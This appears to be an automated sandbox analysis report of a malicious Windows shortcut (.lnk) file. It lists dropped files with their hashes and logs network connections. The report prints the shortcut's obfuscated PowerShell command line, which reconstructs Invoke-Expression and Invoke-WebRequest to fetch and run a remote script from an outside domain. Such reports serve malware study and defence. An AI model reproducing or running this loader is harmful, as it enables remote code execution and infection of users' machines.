                                                              MD5:270F304CACB1D05495BC219094387FFD
                                                              SHA1:0BE102C10BC2C336FEB4E15781954D83CF189984
                                                              SHA-256:8A908699C7984E4B422A62F35537A984542FC1C8963CA653ACCFFDDAB956DA79
                                                              SHA-512:817BF417212525FD1C12772745FE319930414244619E38B001801312A38A59BD162D3D6F7AE7DB161A0882C3C20173415E34F176F13111C3D9F4D23DEF234083
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):282
                                                              Entropy (8bit):5.246965590328122
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJTqgFCrPeUkwRe9:YvXKXBO+TLUcs/GTq16Ukee9
                                                              MD5:07C8E2511FE65F9BB9DA2B1CE7AF87B5
                                                              SHA1:DD56D662FA42D18AE1AE1E290C33E45C49396343
                                                              SHA-256:39DE479AF3CCB89FBEC42F63AC19C2F9354CB96E0CADC9469E31BBEB2E2233DD
                                                              SHA-512:5FE2724947E829999965DA3492ADBCCF8E1040BFEEEC0A439C6278909E1D0B8A6FD1103B7A311D4D5E234EF004427322A73AC6073D57324FDF5F65F042450C8D
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):4
                                                              Entropy (8bit):0.8112781244591328
                                                              Encrypted:false
                                                              SSDEEP:3:e:e
                                                              MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                              SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                              SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                              SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                              Malicious:false
                                                              Preview:....
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):2814
                                                              Entropy (8bit):5.143950224243171
                                                              Encrypted:false
                                                              SSDEEP:48:YwvGP5dCxqP+VuQ+c3t/RaMHOb85oRRA9w43:mRPDQ+q7v5DD
                                                              MD5:E864EB2E3E26DBCAE628AB336FF5A3FF
                                                              SHA1:0AAE4E13B50B6C3BB644DDB0BD4EF3B3F5358067
                                                              SHA-256:19D80B24ADA6C4226B48976EDAEED04460FB255FF06D65956CC74D262F8C1ED7
                                                              SHA-512:E7467D058F5EB7FDA60B6FDF690057B1B88F07B9353D44856E882867B4FDC29D2618E706E874C5BE2A4CC8ED83D1A0CC96A8E3248E501F1FD32EDCDE497F0759
                                                              Malicious:false
                                                              Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"ebc67c77b5892952942cb67413b21099","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734605792000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"8db10abfa84b7ed5e7b3c15af6207903","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734605792000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"eccbf3092cdc076b87716179b6863698","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":289,"ts":1734605792000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"bb49a32d4907f24ff9e0ba57a89dde64","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734605792000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"c64c937a708137bcf84bd73602eb2caa","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734605792000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"7ad66b931d8128e719aae035237a7703","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","size":
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 24, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 24
                                                              Category:dropped
                                                              Size (bytes):12288
                                                              Entropy (8bit):1.1458694936830254
                                                              Encrypted:false
                                                              SSDEEP:24:TLhx/XYKQvGJF7ursuRZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHN:TFl2GL7mswXc+XcGNFlRYIX2v3kN
                                                              MD5:DC5EA9BCE41723D41591BA6DC370718C
                                                              SHA1:7E463970804AAAE9C5F6B93C3C12E47C35A07C10
                                                              SHA-256:BE575EA673B15229E13CDF10CEF1029FB537BF56C3A70D14F22D9204EEDF38BE
                                                              SHA-512:C7037DD972E4C1636E1EB3CBC8A4C71DBA13C31D5ED0F3E280885157E27B618E5B6D60E5DD6D1BE370776436631ACF6FA07F731DF09ACDCD8186B445DE16EC37
                                                              Malicious:false
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:SQLite Rollback Journal
                                                              Category:dropped
                                                              Size (bytes):8720
                                                              Entropy (8bit):1.5496832834098873
                                                              Encrypted:false
                                                              SSDEEP:24:7+tcUXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLuxLqLxx/XYKQ1:7MRXc+XcGNFlRYIX2v2qVl2GL7msG
                                                              MD5:6392364EDEC3941CF644A9F988BA88D2
                                                              SHA1:BFDDA9F54F60BBB0AAEBCAE46A46D003CF48958C
                                                              SHA-256:2E25D5594415A860FF9AFA038F2E69CB6A478FFDA75FCF982A74E5D1DE55FE25
                                                              SHA-512:21D65EC3DA691F5221248EB2318BBAAF2B21BF2D08A3A30950BE183A9DCAE51CFD02A405CE84947CDCAA8E8FD0943F98DE090E5DFCF7FD66EF779FA7D783A046
                                                              Malicious:false
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):66726
                                                              Entropy (8bit):5.392739213842091
                                                              Encrypted:false
                                                              SSDEEP:768:RNOpblrU6TBH44ADKZEgKSk7On0ouTRZM4LrXyJZleIQ4K4Yyu:6a6TZ44ADEKSCOn0ouTRXvJ4fK
                                                              MD5:751110CFCCA4EE5954B756A4680C691C
                                                              SHA1:8A29FA93B1663A2717BF889E6A0071B8EA91CBBE
                                                              SHA-256:E15019DCEF8A926B7E06456E064C1025CB81316211876F02A9173A950B4EB807
                                                              SHA-512:6E89DB893B1D7AA999B3F6DA4664D0E86110A56D9C9BC7583052A5EE5D7B29C5450EE33D93CDCBC6B70E7C1C4906106E1166FE96F2941D012D9EFCFFE00D42EE
                                                              Malicious:false
                                                              Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):11608
                                                              Entropy (8bit):4.890472898059848
                                                              Encrypted:false
                                                              SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                              MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                              SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                              SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                              SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                              Malicious:false
                                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):1.1940658735648508
                                                              Encrypted:false
                                                              SSDEEP:3:NlllulnmWllZ:NllUmWl
                                                              MD5:3EBBEC2F920D055DAC842B4FF84448FA
                                                              SHA1:52D2AD86C481FAED6187FC7E6655C5BD646CA663
                                                              SHA-256:32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09
                                                              SHA-512:163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3
                                                              Malicious:false
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):246
                                                              Entropy (8bit):3.5274671434738973
                                                              Encrypted:false
                                                              SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8mUlAmfQ9w:Qw946cPbiOxDlbYnuRKs3
                                                              MD5:DA29388F4A29A3ACE9EA754862060A74
                                                              SHA1:88883100BB4442939A63E7CD4F5321F9E490B231
                                                              SHA-256:C5EA3C060FB27DAD9990C9081904FF6AA24DA420906CF8B0252F6B9AD5CAB3BD
                                                              SHA-512:747772A522223B6ABCAA836E5224C86C5216974A73CFE0E2274596FC19B7DDBDA51787FAA7173289623D544B2158689B8829C8D58B6D8893C93043A9FB1AEF30
                                                              Malicious:false
                                                              Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.9./.1.2./.2.0.2.4. . .0.5.:.5.6.:.2.9. .=.=.=.....
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:ASCII text, with very long lines (393)
                                                              Category:dropped
                                                              Size (bytes):16525
                                                              Entropy (8bit):5.338264912747007
                                                              Encrypted:false
                                                              SSDEEP:384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb
                                                              MD5:128A51060103D95314048C2F32A15C66
                                                              SHA1:EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB
                                                              SHA-256:601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713
                                                              SHA-512:55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677
                                                              Malicious:false
                                                              Preview:SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):15114
                                                              Entropy (8bit):5.335046752204758
                                                              Encrypted:false
                                                              SSDEEP:384:an2g6gJgCBWBdBOpBpBgBQBXBxKW5P5B5P4Z4+4e4/4C4mH/8M/76etD8f8dvJvE:mUb
                                                              MD5:1128F30E29F1D04CA0C9342FEAB6EB0E
                                                              SHA1:A201ACC01BF114A5B7D6EB978C47E3295B8C0D2D
                                                              SHA-256:B0480ED4508ECDA2513754D4EE93273438C8E1D560F4DB4F6991DFA707EA2B82
                                                              SHA-512:18CC3735A1EF4D22C166325873A30C7626476BEE89010E21A40390AE8ECABE607F965983DF2356DAAF0593F410D3DA7CBF114E76643C7A89A7B7CC684CFE4874
                                                              Malicious:false
                                                              Preview:SessionID=0105487a-1a0a-4d30-97cd-bcc083b9727e.1734605784005 Timestamp=2024-12-19T05:56:24:005-0500 ThreadID=7196 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=0105487a-1a0a-4d30-97cd-bcc083b9727e.1734605784005 Timestamp=2024-12-19T05:56:24:006-0500 ThreadID=7196 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=0105487a-1a0a-4d30-97cd-bcc083b9727e.1734605784005 Timestamp=2024-12-19T05:56:24:006-0500 ThreadID=7196 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=0105487a-1a0a-4d30-97cd-bcc083b9727e.1734605784005 Timestamp=2024-12-19T05:56:24:006-0500 ThreadID=7196 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=0105487a-1a0a-4d30-97cd-bcc083b9727e.1734605784005 Timestamp=2024-12-19T05:56:24:007-0500 ThreadID=7196 Component=ngl-lib_NglAppLib Description="SetConf
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):29752
                                                              Entropy (8bit):5.407347364773622
                                                              Encrypted:false
                                                              SSDEEP:192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcbiSmSYSYSESHSIStSaS3SXSaSMd:V3fOCIdJDeO+9A
                                                              MD5:4253D91492825DBF74976DF74BBD79B6
                                                              SHA1:D3CE80349ABB65F56351CE399FB8CA7104295DDB
                                                              SHA-256:8CD36E4C2A86C2E8AD4C9949864F8E0B10D23ECD2B01326F68D79B9B05E92412
                                                              SHA-512:6DDE5E0E18062F5867CAF6E5C5CFF4CC97DA5649A98BC5E0ED342AB97FDF8F58F201AF85E8DF00093BA233C494820D7CB968A171C2E982DF4B2C2431BB10D595
                                                              Malicious:false
                                                              Preview:05-10-2023 08:20:22:.---2---..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:20:22:.Closing File..05-10-
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                              Category:dropped
                                                              Size (bytes):758601
                                                              Entropy (8bit):7.98639316555857
                                                              Encrypted:false
                                                              SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                              MD5:3A49135134665364308390AC398006F1
                                                              SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                              SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                              SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                              Malicious:false
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                              Category:dropped
                                                              Size (bytes):1419751
                                                              Entropy (8bit):7.976496077007677
                                                              Encrypted:false
                                                              SSDEEP:24576:/rwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TwZG6bWLxBGZN3mlind9i4ufFXpAXkru
                                                              MD5:95F182500FC92778102336D2D5AADCC8
                                                              SHA1:BEC510B6B3D595833AF46B04C5843B95D2A0A6C9
                                                              SHA-256:9F9C041D7EE1DA404E53022D475B9E6D5924A17C08D5FDEC58C0A1DCDCC4D4C9
                                                              SHA-512:D7C022459486D124CC6CDACEAD8D46E16EDC472F4780A27C29D98B35AD01A9BA95F62155433264CC12C32BFF384C7ECAFCE0AC45853326CBC622AE65EE0D90BA
                                                              Malicious:false
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                              Category:dropped
                                                              Size (bytes):386528
                                                              Entropy (8bit):7.9736851559892425
                                                              Encrypted:false
                                                              SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                              MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                              SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                              SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                              SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                              Malicious:false
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                              Category:dropped
                                                              Size (bytes):1407294
                                                              Entropy (8bit):7.97605879016224
                                                              Encrypted:false
                                                              SSDEEP:24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07tOWLaGZ4ZwYIGNPS:RB3mlind9i4ufFXpAXkrfUs0kWLaGZ48
                                                              MD5:1D64D25345DD73F100517644279994E6
                                                              SHA1:DE807F82098D469302955DCBE1A963CD6E887737
                                                              SHA-256:0A05C4CE0C4D8527D79A3C9CEE2A8B73475F53E18544622E4656C598BC814DFC
                                                              SHA-512:C0A37437F84B4895A7566E278046CFD50558AD84120CA0BD2EAD2259CA7A30BD67F0BDC4C043D73257773C607259A64B6F6AE4987C8B43BB47241F3C78EB9416
                                                              Malicious:false
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):4513
                                                              Entropy (8bit):3.7741178368991997
                                                              Encrypted:false
                                                              SSDEEP:48:hjR4L7NPNlHJXqSogZocbNPNlLXqSogZo41:hj6NPNPH5NPNpHv
                                                              MD5:657C38A02C9B64E38ABA248F21DD8E47
                                                              SHA1:05634B2F146D0F19115C259A2BA78A6A2B739AF1
                                                              SHA-256:B1F39C3950356BA203AA74797DCCF79AA8EBC510C7D478A187BDE4CBD5FFAFE8
                                                              SHA-512:D0EB14364F00FD71EA7B3054504ADF91FE12B7AD820761271AD6AEE38A71CC388147573ADC1FFA21A72C265D613DC5D86F248983783387390620639F691CFD27
                                                              Malicious:false
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):4513
                                                              Entropy (8bit):3.7741178368991997
                                                              Encrypted:false
                                                              SSDEEP:48:hjR4L7NPNlHJXqSogZocbNPNlLXqSogZo41:hj6NPNPH5NPNpHv
                                                              MD5:657C38A02C9B64E38ABA248F21DD8E47
                                                              SHA1:05634B2F146D0F19115C259A2BA78A6A2B739AF1
                                                              SHA-256:B1F39C3950356BA203AA74797DCCF79AA8EBC510C7D478A187BDE4CBD5FFAFE8
                                                              SHA-512:D0EB14364F00FD71EA7B3054504ADF91FE12B7AD820761271AD6AEE38A71CC388147573ADC1FFA21A72C265D613DC5D86F248983783387390620639F691CFD27
                                                              Malicious:false
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:PDF document, version 1.7 (zip deflate encoded)
                                                              Category:dropped
                                                              Size (bytes):871324
                                                              Entropy (8bit):7.827941732382635
                                                              Encrypted:false
                                                              SSDEEP:24576:H8QbZ2upCDtuOQKE7nmA3xWYT6LTA2D9dx5:HXpCST7ntB+jDTx5
                                                              MD5:CC648C9FBCD03EAC939663F24ED3AB02
                                                              SHA1:56F288BABF7DA8A89354140BC5A6C6D09CFEDCAD
                                                              SHA-256:F4A5A2657C465B26BB136761227F9D640CD156BABDE0CB78297429020EE1B3D3
                                                              SHA-512:5F27E7000A182D1477A7F9DD36AFA668380DE68EF78AC47575ED8414C7D92467B30FDD653DD3A2609CA4250EAAFBD6D56DA5DE375D189222C477346CE8B35AC7
                                                              Malicious:false
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):55
                                                              Entropy (8bit):4.306461250274409
                                                              Encrypted:false
                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                              Malicious:false
                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                              File type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=260, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                              Entropy (8bit):3.643533705038239
                                                              TrID:
                                                              • Windows Shortcut (20020/1) 100.00%
                                                              File name:0bNBLjPn56.lnk
                                                              File size:1'794 bytes
                                                              MD5:898a7ff6f3cc5cc4f216687d30dac587
                                                              SHA1:9f47ae1aae02b3b1a8b4481b755027f78db2d68f
                                                              SHA256:18606c684a9f169298350be1dc11f222d27c68789953f78d0feedfea90d07c53
                                                              SHA512:a641ce058425a351f6075801d3949ba75ea84da1b5d17cbc0b20890739854e0f1c4494bc1a56b26fffcd4ae6958e2da86ca91f04fc9598818318a3ad4ae3319d
                                                              SSDEEP:24:8+pHYVKVW7/CWFYlhl3fYlTwNYlT0la/GWWX/GoX/GwlAEl3VChlT0lclTAEI75w:8wav3J0k/BWX/pX/Mp/04c1w
                                                              TLSH:2F3120441B710754E6BBAA36A8EBB201E53E7845DB738F8A014251D62BA0225F46DF2F
                                                              Icon Hash:009280889081ad0d

                                                              General

                                                              Relative Path:..\..\..\..\windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Command Line Argument:${kilo4z} = $PSHOME;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'A' + ${kilo4z}[-66 +55];${o5d.} = $([TYPE]${*opso25.});${*.f2iuzg.} = ${o5d.}::ToString(+79 -1 -5)+${o5d.}::ToString(+79 -1 -5 -4)+${o5d.}::ToString(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -UseBasicParsing'))
                                                              Icon location:imageres.dll
                                                              Timestamp                            Source Port  Dest Port  Source IP        Dest IP
                                                              Dec 19, 2024 11:56:11.455332041 CET  49721        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:11.455370903 CET  443          49721      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:11.455503941 CET  49721        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:11.469067097 CET  49721        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:11.469086885 CET  443          49721      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:12.726809978 CET  443          49721      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:12.726975918 CET  49721        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:12.761195898 CET  49721        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:12.761219025 CET  443          49721      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:12.761691093 CET  443          49721      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:12.782438993 CET  49721        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:12.823374033 CET  443          49721      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:13.172883987 CET  443          49721      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:13.172967911 CET  443          49721      107.161.23.150   192.168.2.6
